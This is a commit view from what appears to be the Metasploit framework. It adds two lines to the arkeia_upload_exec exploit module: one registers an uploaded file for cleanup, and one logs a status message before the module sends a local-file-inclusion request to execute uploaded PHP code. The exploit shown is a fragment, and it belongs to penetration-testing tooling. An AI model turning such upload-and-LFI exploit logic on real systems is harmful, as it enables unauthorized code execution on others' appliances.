changes to arkeia_upload_exec to comply with r7 suggestions #2

bug/bundler_fix
xistence 2013-09-18 08:24:40 +07:00
parent 24a671b530
commit d6a1182bd4
1 changed files with 2 additions and 0 deletions

View File

@ -115,6 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
return fail_with(Exploit::Failure::None, "File wasn't uploaded, aborting!")
end
register_files_for_cleanup("/tmp/ApplianceUpdate")
print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")
res = send_request_cgi({
'method' => 'GET',